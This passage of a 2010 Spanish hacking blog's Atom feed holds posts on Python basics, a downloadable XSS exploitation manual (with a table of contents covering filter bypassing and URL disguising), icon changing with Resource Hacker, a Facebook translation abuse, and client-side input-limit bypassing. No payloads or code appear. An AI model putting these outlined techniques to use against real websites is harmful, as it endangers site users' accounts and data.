/&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;Python es un lenguaje de programación creado por &lt;b style="color: black;"&gt;Guido van Rossum&lt;/b&gt; a principios de los años 90 cuyo nombre está inspirado en el grupo de cómicos ingleses “Monty Python”. Es un lenguaje similar a Perl, pero con una sintaxis muy limpia y que favorece un código legible.&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="color: #666666; text-align: center;"&gt;&lt;span style="font-size: large;"&gt;&lt;b&gt;¿De donde puedo descargarlo?&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;Puedes descargarlo desde la pagina oficial de python:&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="color: red; text-align: center;"&gt;&lt;a href="http://python.org/download/"&gt;http://python.org/download/&lt;/a&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="color: #666666; text-align: center;"&gt;&lt;span style="font-size: large;"&gt;&lt;b&gt;¿Sobre que trata?&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="color: black; text-align: center;"&gt;Se trata de un lenguaje interpretado o de script, con tipado dinámico, fuertemente tipado, multiplataforma y &lt;b&gt;orientado a objetos&lt;/b&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="color: #666666; text-align: center;"&gt;&lt;span style="font-size: large;"&gt;&lt;b&gt;¿Lenguaje intrepretado o de script?&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;Un lenguaje interpretado o de script es aquel que&lt;b style="color: red;"&gt; &lt;span style="color: black;"&gt;se ejecuta utilizando un programa intermedio&lt;/span&gt; &lt;/b&gt;llamado intérprete, en lugar de compilar el código a lenguaje máquina que pueda comprender y ejecutar directamente una computadora (lenguajes compilados).&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;La ventaja de los lenguajes compilados es que su ejecución es más rápida. &lt;b style="color: black;"&gt;Sin embargo los lenguajes interpretados son más flexibles y más portables&lt;/b&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="color: #666666; text-align: center;"&gt;&lt;span style="font-size: large;"&gt;&lt;b&gt;Tipado dinámico&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;La característica de tipado dinámico se refiere a que no es necesario declarar el tipo de dato que va a contener una determinada variable, sino que &lt;b&gt;&lt;span style="color: black;"&gt;su tipo se determinará en tiempo de ejecución&lt;/span&gt;&lt;/b&gt; según el tipo del valor al que se asigne, y el tipo de esta variable puede cambiar si se le asigna un valor de otro tipo.&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="color: #666666; text-align: center;"&gt;&lt;span style="font-size: large;"&gt;&lt;b&gt;Fuertemente tipado&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;No se permite tratar a una variable como si fuera de un tipo distinto al que tiene, es necesario convertir de forma explícita dicha variable al nuevo tipo previamente. En otros lenguajes el tipo de la variable cambiaría para adaptarse al comportamiento esperado, aunque esto es más propenso a errores.&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="color: #666666; text-align: center;"&gt;&lt;span style="font-size: large;"&gt;&lt;b&gt;Multiplataforma&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;El intérprete de Python está disponible en multitud de plataformas (UNIX, Solaris, Linux, DOS, Windows, OS/2, Mac OS, etc.) por lo que si no utilizamos librerías específicas de cada plataforma&lt;b&gt;&lt;span style="color: red;"&gt; &lt;span style="color: black;"&gt;nuestro programa podrá correr en todos estos sistemas sin grandes cambios&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;. Y no solo eso, sino que tambien podremos convertir nuestro archivo .py a .exe para que corra sin necesidad de tener instalado el interprete en Windows.&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="color: #666666; text-align: center;"&gt;&lt;span style="font-size: large;"&gt;&lt;b&gt;Orientado a objetos&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;La orientación a objetos es un paradigma de programación en el que los conceptos del mundo real relevantes para nuestro problema se trasladan a clases y objetos en nuestro programa. La ejecución del programa consiste en una serie de interacciones entre los objetos.&lt;/div&gt;&lt;div style="text-align: center;"&gt;Python también permite la programación imperativa, programación funcional y programación orientada a aspectos&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="color: #666666; text-align: center;"&gt;&lt;span style="font-size: large;"&gt;&lt;b&gt;¿De que consta un codigo python?&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;Python no necesita clases, ni funciones, ni nada de nada para poder funcionar, con solo crear un archivo llamado .py podemos utilizarlo.&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="color: #666666; text-align: center;"&gt;&lt;span style="font-size: large;"&gt;&lt;b&gt;¿Que puedo crear con python?&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;Puedes crear infinidad de cosas en Python, ya que este cuenta con muchas librerias para todos los usos que podamos darles. Podemos crear chats, malware, bases de datos, calculadoras, encriptadores, etc... Todo depende de nuestra imaginacion&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;a href="http://docs.python.org/library/index.html"&gt;Click aqui para ver la Libreria de Python&lt;/a&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="color: #666666; text-align: center;"&gt;&lt;span style="font-size: large;"&gt;&lt;b&gt;¿Python puede utilizar interfaces graficas?&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;Si, puede. Tales como PyGame (para programar juegos), PyQT, PyTK, PyGTK, wXPython, Gist, etc.&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;a href="http://foro.portalhacker.net/index.php/topic,113347.0.html"&gt;Aprende Python Gist con este excelente manual&lt;/a&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;a href="http://foro.portalhacker.net/index.php/topic,113345.0.html"&gt;Aprende PyGTK con este manual con mas de 400&lt;/a&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;a href="http://foro.portalhacker.net/index.php/topic,113335.0.html%5D"&gt;PyQT: Desarrollando aplicaciones de escritorio&lt;/a&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="color: #666666; text-align: center;"&gt;&lt;span style="font-size: large;"&gt;&lt;b&gt;Links Interesantes:&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;a href="http://www.blogger.com/goog_1471061080"&gt;&lt;br /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;a href="http://foro.portalhacker.net/index.php/topic,113349.0.html"&gt;Guia de manuales en la seccion de CPH&lt;/a&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;a href="http://foro.portalhacker.net/index.php/topic,113352.0.html"&gt;GUia de codes/aportes interesantes de CPH&lt;/a&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1031582156912374124-1083151252405639995?l=high-risk-team.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://high-risk-team.blogspot.com/feeds/1083151252405639995/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://high-risk-team.blogspot.com/2010/08/python-todo-sobre-este-gran-lenguaje.html#comment-form' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1031582156912374124/posts/default/1083151252405639995'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1031582156912374124/posts/default/1083151252405639995'/><link rel='alternate' type='text/html' href='http://high-risk-team.blogspot.com/2010/08/python-todo-sobre-este-gran-lenguaje.html' title='Python: Todo sobre este gran lenguaje'/><author><name>Franco di</name><uri>http://www.blogger.com/profile/08925043126018389795</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1031582156912374124.post-7785788821232066057</id><published>2010-07-31T20:21:00.001-07:00</published><updated>2010-07-31T20:22:02.573-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Papers'/><category scheme='http://www.blogger.com/atom/ns#' term='bugsnivelweb'/><category scheme='http://www.blogger.com/atom/ns#' term='XSS'/><title type='text'>Cross Site Scripting</title><content type='html'>Bueno gente, aca les voy a dejar un posteito que llevo hace bastante  tiempo (aproximadamente cuatro dias) realizandolo y me termino de quedar  "Lindo", por lo menos para mi jaja. Bueno en fin, les dejo el "Temario"  del manual para descargar para que puedan ver el tipo de contenido.&lt;br /&gt;&lt;br /&gt;&lt;meta content="text/html; charset=utf-8" http-equiv="Content-Type"&gt;&lt;/meta&gt;&lt;meta content="Word.Document" name="ProgId"&gt;&lt;/meta&gt;&lt;meta content="Microsoft Word 11" name="Generator"&gt;&lt;/meta&gt;&lt;meta content="Microsoft Word 11" name="Originator"&gt;&lt;/meta&gt;&lt;link href="file:///C:%5CDOCUME%7E1%5CADMINI%7E1%5CCONFIG%7E1%5CTemp%5Cmsohtml1%5C01%5Cclip_filelist.xml" rel="File-List"&gt;&lt;/link&gt;&lt;o:smarttagtype name="PersonName" namespaceuri="urn:schemas-microsoft-com:office:smarttags"&gt;&lt;/o:smarttagtype&gt;&lt;style&gt;&lt;!-- /* Font Definitions */ @font-face	{font-family:Wingdings;	panose-1:5 0 0 0 0 0 0 0 0 0;	mso-font-charset:2;	mso-generic-font-family:auto;	mso-font-pitch:variable;	mso-font-signature:0 268435456 0 0 -2147483648 0;} /* Style Definitions */ p.MsoNormal, li.MsoNormal, div.MsoNormal	{mso-style-parent:"";	margin:0cm;	margin-bottom:.0001pt;	mso-pagination:widow-orphan;	font-size:12.0pt;	font-family:"Times New Roman";	mso-fareast-font-family:"Times New Roman";}@page Section1	{size:612.0pt 792.0pt;	margin:70.85pt 3.0cm 70.85pt 3.0cm;	mso-header-margin:36.0pt;	mso-footer-margin:36.0pt;	mso-paper-source:0;}div.Section1	{page:Section1;}--&gt;&lt;/style&gt;  &lt;br /&gt;&lt;div class="MsoNormal"&gt;&lt;span style="color: red;"&gt;0x001:&lt;/span&gt;&lt;span style="color: red;"&gt; Palabras iniciales&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;span style="color: red;"&gt;0x002:&lt;/span&gt;&lt;span style="color: red;"&gt; ¿Que es XSS?&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;span style="color: red;"&gt;0x003:&lt;/span&gt;&lt;span style="color: red;"&gt; Codes de paginas vulnerables/Taller de pruebas&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;span style="color: red;"&gt;0x004 &lt;span style="font-family: Wingdings;"&gt;:&lt;/span&gt;&lt;/span&gt;&lt;span style="color: red;"&gt; ¿Qué son las cookies?&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;span style="color: red;"&gt;0x005 &lt;span style="font-family: Wingdings;"&gt;:&lt;/span&gt;&lt;/span&gt;&lt;span style="color: red;"&gt; Explicación para explotar la vulnerabilidad&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;span style="color: red;"&gt;0x006&lt;/span&gt;&lt;span style="color: red;"&gt;&lt;span style="font-family: Wingdings;"&gt;:&lt;/span&gt;&lt;/span&gt;&lt;span style="color: red;"&gt; Tipos de XSS&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;span style="color: red;"&gt;0x007 &lt;/span&gt;&lt;span style="color: red;"&gt;&lt;span style="font-family: Wingdings;"&gt;:&lt;/span&gt;&lt;/span&gt;&lt;span style="color: red;"&gt; Escenario de ataque XSS reflejado&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;span style="color: red;"&gt;0x008 &lt;/span&gt;&lt;span style="color: red;"&gt;&lt;span style="font-family: Wingdings;"&gt;:&lt;/span&gt;&lt;/span&gt;&lt;span style="color: red;"&gt; Métodos de inyección y tipos de ataque&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;span style="color: red;"&gt;0x009&lt;/span&gt;&lt;span style="color: red;"&gt;&lt;span style="font-family: Wingdings;"&gt;:&lt;/span&gt;&lt;/span&gt;&lt;span style="color: red;"&gt; &lt;/span&gt;&lt;span style="color: red;"&gt;Disfrasando &lt;st1:personname productid="la URL ￼ Mostrar" w:st="on"&gt;&lt;st1:personname productid="la URL" w:st="on"&gt;la URL&lt;/st1:personname&gt; &lt;span style="font-family: Wingdings;"&gt;à&lt;/span&gt;  Mostrar&lt;/st1:personname&gt; como encriptar&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;span style="color: red;"&gt;0x010&lt;/span&gt;&lt;span style="color: red;"&gt;&lt;span style="font-family: Wingdings;"&gt;:&lt;/span&gt;&lt;/span&gt;&lt;span style="color: red;"&gt; ByPassing de filtros&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;span style="color: red;"&gt;0x011&lt;/span&gt;&lt;span style="color: red;"&gt;&lt;span style="font-family: Wingdings;"&gt;:&lt;/span&gt;&lt;/span&gt;&lt;span style="color: red;"&gt; Arreglando el Fallo&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;span style="color: red;"&gt;&lt;o:p&gt;&lt;br /&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;span style="color: red;"&gt;&lt;o:p&gt;&lt;span style="color: black;"&gt;Pd: Antes de que me olvide son 14 hojas en formato word, incluye imagenes y codigos fuente para que puedan practicar&lt;/span&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;span style="color: red;"&gt;&lt;o:p&gt;&lt;span style="color: black;"&gt;PD: Aca tienen la pagina para poder practicar lo que se dice en el tutorial sin la necesidad de montar ningun servidor web&lt;/span&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;a href="http://www.pruebas18p.webcindario.com/webv.php"&gt;&lt;span style="color: red;"&gt;&lt;o:p&gt;&lt;span style="color: black;"&gt;http://www.pruebas18p.webcindario.com/webv.php&lt;/span&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="color: red; text-align: center;"&gt;&lt;b&gt;&lt;o:p&gt;Aqui los archivos para descargar:&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;span style="color: red;"&gt;&lt;o:p&gt;&lt;span style="color: black;"&gt; &lt;/span&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;span style="color: red;"&gt;&lt;o:p&gt;&lt;span style="color: black;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;b&gt;&lt;a href="http://www.megaupload.com/?d=U3PCQFNV" style="color: red;"&gt;MegaUpload&lt;/a&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="text-align: center;"&gt;&lt;span style="color: red;"&gt;&lt;o:p&gt;&lt;b&gt;&lt;a href="http://rapidshare.com/files/410294119/Manual_XSS_blog.rar" style="color: red;"&gt;RapidShare&lt;/a&gt;&lt;/b&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1031582156912374124-7785788821232066057?l=high-risk-team.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://high-risk-team.blogspot.com/feeds/7785788821232066057/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://high-risk-team.blogspot.com/2010/07/cross-site-scripting.html#comment-form' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1031582156912374124/posts/default/7785788821232066057'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1031582156912374124/posts/default/7785788821232066057'/><link rel='alternate' type='text/html' href='http://high-risk-team.blogspot.com/2010/07/cross-site-scripting.html' title='Cross Site Scripting'/><author><name>Franco di</name><uri>http://www.blogger.com/profile/08925043126018389795</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1031582156912374124.post-456866938648103116</id><published>2010-07-31T09:05:00.000-07:00</published><updated>2010-07-31T20:23:01.060-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Res Hacker'/><category scheme='http://www.blogger.com/atom/ns#' term='Papers'/><category scheme='http://www.blogger.com/atom/ns#' term='Hacking'/><title type='text'>Cambiando Icono con Resource Hacker</title><content type='html'>Hola, en este tutorial, les enseñare a cambiar el icono de nuestra aplicacion con el famoso software:&lt;br /&gt;&lt;b&gt;&lt;span style="color: red;"&gt;Resource Hacker&lt;/span&gt;&lt;/b&gt;, este programa lo pueden descargar&lt;b&gt; &lt;a href="http://www.megaupload.com/?d=BUL8UVQR"&gt;AQUI&lt;/a&gt;.&lt;/b&gt;&lt;br /&gt;Y aqui tambien les dejo un Pack de iconos, que nos sera de gran utilidad para el proceso de modificacion de nuestro archivo.&lt;br /&gt;Los pueden descargar de &lt;b&gt;&lt;a href="http://www.megaupload.com/?d=ZLHH94TW"&gt;AQUI&lt;/a&gt;.&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;Bueno, aca les dejo el tutorial para descargar en formato de Word, este viene acompañado con imagenes para seguir la lectura, Bueno en fin, aca les dejo el archivo.&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;b&gt;&lt;a href="http://www.megaupload.com/?d=YZGSLUR6" style="color: red;"&gt;MegaUpload&lt;/a&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;b&gt;&lt;a href="http://rapidshare.com/files/410213412/Resource_Hacker_blog.rar"&gt;RapidShare&lt;/a&gt;&lt;/b&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;Les dejo una screen de lo que se puede realizar con este software (el archivo es el mismo, noten la diferencia en el icono)&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://img52.imageshack.us/img52/8287/86684944.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="360" src="http://img52.imageshack.us/img52/8287/86684944.jpg" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;Saludos&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: right;"&gt;&lt;b&gt;&lt;span style="color: red;"&gt;Dr [F]&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style="text-align: right;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: left;"&gt;PD: Cualquier duda o sugerencia ser tan amables de postearla en los comentarios :)&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1031582156912374124-456866938648103116?l=high-risk-team.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://high-risk-team.blogspot.com/feeds/456866938648103116/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://high-risk-team.blogspot.com/2010/07/cambiando-icono-con-resource-hacker.html#comment-form' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1031582156912374124/posts/default/456866938648103116'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1031582156912374124/posts/default/456866938648103116'/><link rel='alternate' type='text/html' href='http://high-risk-team.blogspot.com/2010/07/cambiando-icono-con-resource-hacker.html' title='Cambiando Icono con Resource Hacker'/><author><name>Franco di</name><uri>http://www.blogger.com/profile/08925043126018389795</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1031582156912374124.post-971051385156754296</id><published>2010-07-30T09:20:00.000-07:00</published><updated>2010-07-30T09:21:21.040-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Facebook'/><category scheme='http://www.blogger.com/atom/ns#' term='bugsnivelweb'/><title type='text'>Como "Hackearon" Facebook</title><content type='html'>&lt;span style="color: red;"&gt;&lt;center&gt;&lt;b&gt;Metodo Utilizado&lt;/b&gt;&lt;/center&gt;&lt;/span&gt;&lt;br /&gt;Muy ingenioso el ataque,  Aparentemente no se trató de un acceso  indebido a los sistemas, sino de una ingeniosa burla al sistema de  traducción  que le permite a los usuarios proponer mejoras en las  traducciones a otros idiomas distintos al inglés. Básicamente lo que  hicieron un grupo de usuarios fue crear cientos de perfiles falsos, y  con ellos proponer mejores traducciones en forma masiva. Como &lt;span style="color: red;"&gt;Facebook  posee este sistema de “escuchar a los usuarios”, si muchos usuarios  proponen traducciones iguales el cambio se aplica automáticamente&lt;/span&gt; y  queda vulnerable a este tipo de incidentes. ¿Qué pueden hacer los  usuarios? Nada, en este caso sólo esperar que la gente de Facebook  corrija las traducciones que quedaron erróneas.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://fesurf.net/fes2009/images/stories/facebook-m24.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="120" src="http://fesurf.net/fes2009/images/stories/facebook-m24.jpg" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Ahora se comprende porque aparecian frases en portugues, luego en turco,  y algunas en castellano. Se ve que compartieron el metodo en algun  irc/foro y comenzaron a hacerlo varios grupos distintos.&lt;br /&gt;&lt;br /&gt;Fuente: no recuerdo la fuente, enseguida la recuerda la posteo :)&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1031582156912374124-971051385156754296?l=high-risk-team.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://high-risk-team.blogspot.com/feeds/971051385156754296/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://high-risk-team.blogspot.com/2010/07/como-hackearon-facebook.html#comment-form' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1031582156912374124/posts/default/971051385156754296'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1031582156912374124/posts/default/971051385156754296'/><link rel='alternate' type='text/html' href='http://high-risk-team.blogspot.com/2010/07/como-hackearon-facebook.html' title='Como &quot;Hackearon&quot; Facebook'/><author><name>Franco di</name><uri>http://www.blogger.com/profile/08925043126018389795</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1031582156912374124.post-2257419204178063658</id><published>2010-07-28T21:54:00.000-07:00</published><updated>2010-07-28T22:34:53.406-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Papers'/><category scheme='http://www.blogger.com/atom/ns#' term='bugsnivelweb'/><category scheme='http://www.blogger.com/atom/ns#' term='Foot Tampering'/><title type='text'>Foot Tampering</title><content type='html'>&lt;div style="color: red;"&gt;En esta oportunidad les traigo un tutorial de como sacarle el jugo al Foot Tampering, el manual se los dejo para descargar en formato word, consta de siete imagenes que acompañan a la leectura.&lt;/div&gt;&lt;br /&gt;El Foot Tampering, es una tecnica que consiste en la explotacion de alguna falla estupida al estilo de ByPassear un filtro de un maxlenght en un input. Antes que nada, no se puede considerar al Foot Tampering como un bug, ya que no explota ningun fallo de segurdad, solo se podria decir que es una tecnica para "ayudarnos" a explotar alguna falla de seguridad.&lt;br /&gt;&lt;br /&gt;&lt;div style="color: red; text-align: center;"&gt;&lt;b&gt;&lt;a href="http://www.rapidshare.com/files/40971973/Foot_Tampering.rar"&gt;RapidShare&lt;/a&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style="color: red; text-align: center;"&gt;&lt;b&gt;&lt;a href="http://www.megaupload.com/?d=75VW8LB7"&gt;MegaUpload &lt;/a&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1031582156912374124-2257419204178063658?l=high-risk-team.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://high-risk-team.blogspot.com/feeds/2257419204178063658/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://high-risk-team.blogspot.com/2010/07/foot-tampering_28.html#comment-form' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1031582156912374124/posts/default/2257419204178063658'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1031582156912374124/posts/default/2257419204178063658'/><link rel='alternate' type='text/html' href='http://high-risk-team.blogspot.com/2010/07/foot-tampering_28.html' title='Foot Tampering'/><author><name>Franco di</name><uri>http://www.blogger.com/profile/08925043126018389795</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1031582156912374124.post-1299439006620423339</id><published>2010-07-28T09:24:00.000-07:00</published><updated>2010-07-28T09:24:21.250-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Noticias'/><category scheme='http://www.blogger.com/atom/ns#' term='Cosmologia'/><title type='text'>Telescopio Hubble descubre estrella superveloz que se aleja de la galaxia</title><content type='html'>&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://static.betazeta.com/www.fayerwayer.com/up/2010/07/hubble-estrella2-570x456.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="320" 